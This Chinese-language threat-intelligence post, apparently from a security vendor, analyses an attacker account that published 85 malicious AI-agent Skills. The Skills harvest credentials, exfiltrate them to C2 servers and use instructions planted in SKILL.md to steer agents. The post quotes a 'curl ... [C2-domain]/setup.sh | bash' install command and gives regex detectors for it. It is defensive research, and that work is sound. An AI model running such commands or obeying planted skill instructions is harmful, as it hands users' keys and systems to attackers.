对 ClawHub 全量恶意 Skill 数据集(n=157)的统计分析揭示了一个高度异常的结果——smp_170。这个单一攻击者账号贡献了 85 个恶意 Skill,占全部确认恶意样本的 54.1%。更令人震惊的是,其攻击特征具有极高的统计显著性:E2+SC2 指纹识别率达 97.6%,比率比(Odds Ratio)= 556.1,p<0.001。
这不是一个黑客在手工制作恶意脚本。这是一个运营级别的攻击基础设施。
本文数据来自公开发表的 AI Agent 安全研究(Malicious Agent Skills,2025),ClawSafe 团队对检测规则进行了工程化实现。
统计指纹:OR=556 意味着什么
首先解释术语。研究使用以下分类体系描述 Skill 的恶意特征:
- E2:凭证收割(Exfiltration via credential harvesting)——指令中包含读取
.env、~/.ssh、~/.aws等凭证文件的行为 - SC2:C2 通信(Supply Chain C2 communication)——指令中包含向硬编码外部端点发送数据的行为
在统计学中,比率比(Odds Ratio,OR)衡量两组之间某一特征的关联强度。OR=1 表示无关联,OR>10 通常被视为强关联。
smp_170 的 OR=556.1 意味着:携带 E2+SC2 双重指纹的 Skill,其 odds(几率)是非 smp_170 Skill 的 556 倍。这是极强的统计关联。
具体数据:
- smp_170 样本中,83/85(97.6%)同时携带 E2 + SC2 指纹
- 非 smp_170 样本中,仅 5/72(6.9%)携带同样指纹
这个特征组合就是 smp_170 的”DNA”。任何出现这一组合的 Skill,几乎可以确定属于同一攻击基础设施。
核心技战法:26 行不变的社会工程话术
smp_170 最显著的特征是其恶意 Skill 中存在 100% 模板一致性:所有 85 个 Skill 包含完全相同的 26 行社会工程话术。
核心话术如下:
"Your credentials, your choice"
"Credentials...are never transmitted"这两句话经过精心设计:
- 第一句暗示用户拥有控制权,消除警惕
- 第二句直接否认凭证外传行为——而这正是该 Skill 实际在做的事
与此同时,安装流程中包含社会工程指令,引导用户执行类似如下的命令:
curl -sSL https://[C2-domain]/setup.sh | bash这是经典的”curl pipe bash”攻击向量。一旦用户执行,攻击者获得完整的代码执行权限,后续载荷(信息窃取器、反弹 shell 等)随即植入。
品牌仿冒策略:精确的视觉欺骗
smp_170 仿冒了横跨 15 个行业的 85 个品牌——平均每个品牌只被仿冒一次。这种分散策略降低了被单一品牌方的法律/技术团队识别的风险。
仿冒覆盖领域包括:金融服务、加密货币交易所、云服务商、生产力工具、开发者工具、电商平台等。
定制化的战略选择
smp_170 的品牌定制程度呈现出明显的不对称模式(E1/E3 为可见组件,P4 为隐藏的行为操控指令):
| 组件 | 全称 | 定制程度 | 含义 |
|---|---|---|---|
| E3 | 品牌外观/描述文本 | 89% 定制化 | 每个 Skill 看起来都是特定品牌的 |
| E1 | 触发条件/关键词 | 80% 定制化 | 触发词与品牌场景高度匹配 |
| E2 | 凭证收割逻辑 | 71% 定制化 | 部分针对品牌特定凭证类型 |
| P4 | 行为操控指令 | 仅 13% 定制化 | 核心恶意逻辑几乎不变 |
这个策略相当聪明:让用户看到的部分高度定制化(增加可信度),让 Agent 实际执行的恶意逻辑保持通用(降低维护成本)。
漏洞分布的双峰特征:市场商品化的证据
对全样本漏洞数量分布进行统计分析,发现其峰度(kurtosis)为 -1.98——显著偏负峰,呈双峰分布。
两个峰对应两类截然不同的攻击者:
峰一:工厂集群(以 smp_170 为代表)
- 漏洞数量集中在特定区间
- 高度标准化,如流水线生产
- 代表了威胁的商品化(commoditization)
峰二:手工 Skill
- 漏洞数量分散,变异系数高
- 每个 Skill 都有独特的攻击逻辑
- 代表了更有针对性的定制攻击
Gini 系数 0.454 进一步证实了这种不均匀分布:少数攻击者(工厂集群)贡献了绝大多数恶意 Skill。这个数值与某些发展中国家的收入不平等程度相当——AI Agent 威胁景观高度集中。
smp_170 为什么难以检测
名称-漏洞无相关性
整个数据集中,Skill 名称与其恶意程度的 Spearman 相关系数 r = -0.005(p=0.661)。
这意味着:你无法通过 Skill 名称判断它是否恶意。smp_170 的 Skill 名称都是合法品牌名,看起来完全正常。
自然语言攻击面
smp_170 的恶意逻辑主要嵌入在 SKILL.md 的自然语言描述中,而非可执行代码。社会工程话术对人类用户有效,提示词注入对 AI Agent 有效。传统的静态代码分析工具无法检测这类攻击。
SC2 指纹的隐蔽性
E2+SC2 的组合中,SC2(C2 通信)通常伪装为合法的”统计数据上报”或”使用分析”。域名通常是新注册的、看起来无害的名称,不会出现在传统威胁情报黑名单中。
检测方法:从 OR=556 到实用指标
基于 smp_170 的统计指纹,我们建立了以下检测规则:
E2+SC2 双重检测(高精度)
if (contains_credential_harvest AND contains_c2_communication):
probability_smp170_family = 97.6%社会工程话术检测
(?i)(credentials?.*never.*transmit|your.*choice.*credential|privacy.*guaranteed)curl-pipe-bash 检测
curl\s+.*(sSfL|sSL|s).*\|\s*(bash|sh)不对称定制化检测:如果一个 Skill 的品牌外观高度定制(E3),但行为操控指令(P4)却极为通用,这本身就是一个高风险信号。
更广泛的意义:AI Agent 威胁的商品化
smp_170 不是一个偶然现象,而是 AI Agent 威胁景观演化的早期信号。
在传统恶意软件生态中,我们看过同样的演化路径:
- 早期:少数技术精英手工制作,攻击规模有限
- 中期:攻击工具包出现,技术门槛降低
- 成熟期:工厂化生产,攻击商品化,大规模投放
AI Agent Skill 正处于这条曲线的第二到第三阶段转折点。smp_170 已经在展示第三阶段的特征:流水线生产、模板化攻击、跨品牌大规模投放。
如果这个趋势延续,未来的 Skill 市场威胁将不再是散点状的手工攻击,而是类似垃圾邮件的高度自动化批量投放。防御方需要在这条曲线走完之前建立有效的检测机制。
smp_170 案例的核心教训:AI Agent 生态面临的不仅是技术上的安全挑战,更是一个经济上的逐利问题。当攻击的边际成本趋近于零(模板化生产),而每次成功攻击的收益(API Key、加密货币、凭证)极高时,这种规模化攻击是必然出现的,而非偶然。
解决方案同样需要在经济层面思考:提高攻击者的运营成本(检测+封禁+法律风险),降低防御者的检测成本(自动化扫描),才能从根本上改变攻防的收益方程。
ClawSafe 提供免费的 Skill 安全扫描,在安装前检测包括 E2+SC2 双重指纹在内的 20 类威胁模式。